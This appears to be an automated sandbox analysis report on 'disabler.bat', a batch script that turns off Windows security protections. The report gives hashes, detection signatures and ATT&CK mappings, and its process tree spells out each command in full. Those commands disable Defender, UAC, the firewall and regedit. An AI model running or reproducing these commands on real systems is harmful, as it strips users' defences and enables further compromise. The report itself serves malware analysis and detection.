Analysis
  max time kernel: 121s
  max time network: 121s
  platform: windows7_x64
  resource: win7-20240903-en
  resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  submitted: 08/01/2025, 05:12
Static task: static1
Behavioral task: behavioral1
  Sample: disabler.bat
  Resource: win7-20240903-en
Behavioral task: behavioral2
  Sample: disabler.bat
  Resource: win10v2004-20241007-en
General
  Target: disabler.bat
  Size: 2KB
  MD5: c6aff26267067b25326560e96a81513f
  SHA1: e45b8c290c2e9cf625ce255f6d31dda440e3d61e
  SHA256: c7852d05266d27e604e7f988ef728a2d50edf1da816d5963ed93d643831a3e79
  SHA512: d909cfdc454cefb0d26ae72311c27908749c4fa52b4eb2fdf893b30e5d22b024df6e7c8bf2a519877a4995b479e0176730fe5963992057c973a3e9f0569eb441
Malware Config
Signatures

UAC bypass
  description      ioc                                                                                         Process
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"   powershell.exe

Command and Scripting Interpreter: PowerShell (1 TTPs, 8 IoCs)
  Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
  pid   Process
  2612  powershell.exe
  2852  powershell.exe
  2728  powershell.exe
  812   powershell.exe
  3048  powershell.exe
  2800  powershell.exe
  1648  powershell.exe
  1100  powershell.exe

Disables RegEdit via registry modification (1 IoCs)
  description      ioc                                                                                                                                 Process
  Set value (int)  \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"  reg.exe

Modifies Windows Firewall (2 TTPs, 1 IoCs)
  pid   Process
  1996  netsh.exe

Event Triggered Execution: Netsh Helper DLL (1 TTPs, 3 IoCs)
  Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
  description           ioc                                         Process
  Key opened            \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh  netsh.exe
  Key queried           \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh  netsh.exe
  Key value enumerated  \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh  netsh.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses (8 IoCs)
  pid   Process
  2852  powershell.exe
  2612  powershell.exe
  2728  powershell.exe
  812   powershell.exe
  3048  powershell.exe
  2800  powershell.exe
  1648  powershell.exe
  1100  powershell.exe

Suspicious use of AdjustPrivilegeToken (8 IoCs)
  description              pid   Process
  Token: SeDebugPrivilege  2852  powershell.exe
  Token: SeDebugPrivilege  2612  powershell.exe
  Token: SeDebugPrivilege  2728  powershell.exe
  Token: SeDebugPrivilege  812   powershell.exe
  Token: SeDebugPrivilege  3048  powershell.exe
  Token: SeDebugPrivilege  2800  powershell.exe
  Token: SeDebugPrivilege  1648  powershell.exe
  Token: SeDebugPrivilege  1100  powershell.exe

Suspicious use of WriteProcessMemory (54 IoCs)
  description                       pid   Process  procid_target
  PID 2404 wrote to memory of 2764  2404  cmd.exe  32
  PID 2404 wrote to memory of 2764  2404  cmd.exe  32
  PID 2404 wrote to memory of 2764  2404  cmd.exe  32
  PID 2764 wrote to memory of 2768  2764  net.exe  33
  PID 2764 wrote to memory of 2768  2764  net.exe  33
  PID 2764 wrote to memory of 2768  2764  net.exe  33
  PID 2404 wrote to memory of 2824  2404  cmd.exe  34
  PID 2404 wrote to memory of 2824  2404  cmd.exe  34
  PID 2404 wrote to memory of 2824  2404  cmd.exe  34
  PID 2404 wrote to memory of 2760  2404  cmd.exe  35
  PID 2404 wrote to memory of 2760  2404  cmd.exe  35
  PID 2404 wrote to memory of 2760  2404  cmd.exe  35
  PID 2404 wrote to memory of 2688  2404  cmd.exe  36
  PID 2404 wrote to memory of 2688  2404  cmd.exe  36
  PID 2404 wrote to memory of 2688  2404  cmd.exe  36
  PID 2404 wrote to memory of 2692  2404  cmd.exe  37
  PID 2404 wrote to memory of 2692  2404  cmd.exe  37
  PID 2404 wrote to memory of 2692  2404  cmd.exe  37
  PID 2404 wrote to memory of 2244  2404  cmd.exe  38
  PID 2404 wrote to memory of 2244  2404  cmd.exe  38
  PID 2404 wrote to memory of 2244  2404  cmd.exe  38
  PID 2404 wrote to memory of 2976  2404  cmd.exe  39
  PID 2404 wrote to memory of 2976  2404  cmd.exe  39
  PID 2404 wrote to memory of 2976  2404  cmd.exe  39
  PID 2404 wrote to memory of 2852  2404  cmd.exe  40
  PID 2404 wrote to memory of 2852  2404  cmd.exe  40
  PID 2404 wrote to memory of 2852  2404  cmd.exe  40
  PID 2404 wrote to memory of 2612  2404  cmd.exe  41
  PID 2404 wrote to memory of 2612  2404  cmd.exe  41
  PID 2404 wrote to memory of 2612  2404  cmd.exe  41
  PID 2404 wrote to memory of 2728  2404  cmd.exe  42
  PID 2404 wrote to memory of 2728  2404  cmd.exe  42
  PID 2404 wrote to memory of 2728  2404  cmd.exe  42
  PID 2404 wrote to memory of 812   2404  cmd.exe  43
  PID 2404 wrote to memory of 812   2404  cmd.exe  43
  PID 2404 wrote to memory of 812   2404  cmd.exe  43
  PID 2404 wrote to memory of 3048  2404  cmd.exe  44
  PID 2404 wrote to memory of 3048  2404  cmd.exe  44
  PID 2404 wrote to memory of 3048  2404  cmd.exe  44
  PID 2404 wrote to memory of 2800  2404  cmd.exe  45
  PID 2404 wrote to memory of 2800  2404  cmd.exe  45
  PID 2404 wrote to memory of 2800  2404  cmd.exe  45
  PID 2404 wrote to memory of 1648  2404  cmd.exe  46
  PID 2404 wrote to memory of 1648  2404  cmd.exe  46
  PID 2404 wrote to memory of 1648  2404  cmd.exe  46
  PID 2404 wrote to memory of 1100  2404  cmd.exe  47
  PID 2404 wrote to memory of 1100  2404  cmd.exe  47
  PID 2404 wrote to memory of 1100  2404  cmd.exe  47
  PID 2404 wrote to memory of 1996  2404  cmd.exe  48
  PID 2404 wrote to memory of 1996  2404  cmd.exe  48
  PID 2404 wrote to memory of 1996  2404  cmd.exe  48
  PID 2404 wrote to memory of 548   2404  cmd.exe  49
  PID 2404 wrote to memory of 548   2404  cmd.exe  49
  PID 2404 wrote to memory of 548   2404  cmd.exe  49
Processes

C:\Windows\system32\cmd.exe
  cmd /c "C:\Users\Admin\AppData\Local\Temp\disabler.bat"
  PID: 2404
  - Suspicious use of WriteProcessMemory

  C:\Windows\system32\net.exe
    net session
    PID: 2764
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 session
      PID: 2768

  C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    PID: 2824

  C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v WdBoot /t REG_DWORD /d 1 /f
    PID: 2760

  C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v WdFilter /t REG_DWORD /d 1 /f
    PID: 2688

  C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v WdNisDrv /t REG_DWORD /d 1 /f
    PID: 2692

  C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v WdNisSvc /t REG_DWORD /d 1 /f
    PID: 2244

  C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v WinDefend /t REG_DWORD /d 1 /f
    PID: 2976

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' -Name 'EnableLUA' -Value 0"
    PID: 2852
    - UAC bypass
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Add-MpPreference -ExclusionPath 'C:\ruta_a_excluir1' -ExclusionPath 'C:\ruta_a_excluir2'"
    PID: 2612
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Set-MpPreference -PUAProtection Disabled"
    PID: 2728
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Set-MpPreference -HighThreatDefaultAction 6"
    PID: 812
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Set-MpPreference -ModerateThreatDefaultAction 6"
    PID: 3048
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Set-MpPreference -LowThreatDefaultAction 6"
    PID: 2800
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Set-MpPreference -SevereThreatDefaultAction 6"
    PID: 1648
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Set-MpPreference -ScanScheduleDay 8"
    PID: 1100
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\system32\netsh.exe
    netsh advfirewall set allprofiles state off
    PID: 1996
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL

  C:\Windows\system32\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d "1" /f
    PID: 548
    - Disables RegEdit via registry modification
Network
MITRE ATT&CK Enterprise v15

Persistence
  Create or Modify System Process (1)
    Windows Service (1)
  Event Triggered Execution (1)
    Netsh Helper DLL (1)

Privilege Escalation
  Abuse Elevation Control Mechanism (1)
    Bypass User Account Control (1)
  Create or Modify System Process (1)
    Windows Service (1)
  Event Triggered Execution (1)
    Netsh Helper DLL (1)
Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 7KB
  MD5: ba82edd25c65cb9256d9250fdc1ef4df
  SHA1: dc079b101d43a9f11f4dc0db060aefbe9b05c05e
  SHA256: 915a13ceb17014ef3cf432157a2c88bc019a2129bf43015750bc86d1b5080a08
  SHA512: d1d6c8b9c468412c65fc6fbac90f69db30e7363c22340cc7f9f9a5840a30ad0d503dfbd2734ba0a997eeec90ad78ec983541afffe31a9fba497dc653ccaa2433